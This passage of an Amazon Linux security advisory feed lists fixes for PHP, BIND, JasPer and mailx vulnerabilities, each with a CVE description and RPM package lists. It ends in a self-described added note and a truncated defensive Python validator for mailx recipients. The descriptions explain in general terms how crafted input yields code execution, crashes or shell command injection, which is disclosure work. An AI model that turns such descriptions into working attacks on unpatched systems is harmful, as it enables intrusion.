</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142" title="" id="CVE-2014-8142" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-enchant" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.36" release="1.64.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" 
version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.36-1.64.amzn1.i686.rpm</filename></package><package 
name="php54-pspell" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.36" release="1.64.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-process-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.36" release="1.64.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-enchant-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.36-1.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-464</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-464: medium priority package update for php55</title><issued date="2015-01-08 11:35:00" /><updated date="2015-01-08 11:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8142:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.
1175718:
CVE-2014-8142 php: use after free vulnerability in unserialize()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142" title="" id="CVE-2014-8142" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-process" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.20" release="2.94.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package 
name="php55-mcrypt" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.20" release="2.94.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-dba-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.20" release="2.94.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-debuginfo-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.20" release="2.94.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-mssql-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.20-2.94.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-465</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-465: important priority package update for bind</title><issued date="2015-01-08 11:36:00" /><updated date="2015-01-08 11:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8500:
A denial of service flaw was found in the way BIND followed DNS delegations. A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8500" title="" id="CVE-2014-8500" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1984.html" title="" id="RHSA-2014:1984" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" 
release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-466</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-466: important priority package update for jasper</title><issued date="2015-01-08 11:36:00" /><updated date="2015-01-08 11:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9029:
Multiple off-by-one flaws, leading to heap-based buffer overflows, were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2014-8138:
A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2014-8137:
A double free flaw was found in the way JasPer parsed ICC color profiles in JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8137" title="" id="CVE-2014-8137" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8138" title="" id="CVE-2014-8138" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9029" title="" id="CVE-2014-9029" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:2021.html" title="" id="RHSA-2014:2021" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper-libs" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" 
version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-16.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-467</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-467: medium priority package update for mailx</title><issued date="2015-01-08 11:37:00" /><updated date="2015-01-08 11:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7844:
A flaw was found in the way mailx handled the parsing of email addresses. A syntactically valid email address could allow a local attacker to cause mailx to execute arbitrary shell commands through shell meta-characters and the direct command execution functionality.
CVE-2004-2771:
A flaw was found in the way mailx handled the parsing of email addresses. A syntactically valid email address could allow a local attacker to cause mailx to execute arbitrary shell commands through shell meta-characters and the direct command execution functionality.
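<![CDATA[
Both mailx entries above describe the same root cause: a recipient that is a syntactically valid address but that mailx either hands to a shell or interprets itself as a pipe-to-command or write-to-file target. What a script author can do about it, shown as an added Python example (not mailx's code and not part of this advisory): validate recipients against a deliberately narrow grammar, build an argv instead of a shell string, and put "--" before the addresses so that one beginning with "-" cannot be parsed as an option. The address grammar, the 254-character limit and the helper names are this example's own choices.

```python
import re
import subprocess

# Address grammar for this example (an assumption, narrower than RFC 5322 on purpose):
# alphanumeric first character (so no leading '-', '|' or '/'), a small safe alphabet in the
# local part, exactly one '@', and a dotted domain. Anything a shell or mailx itself might
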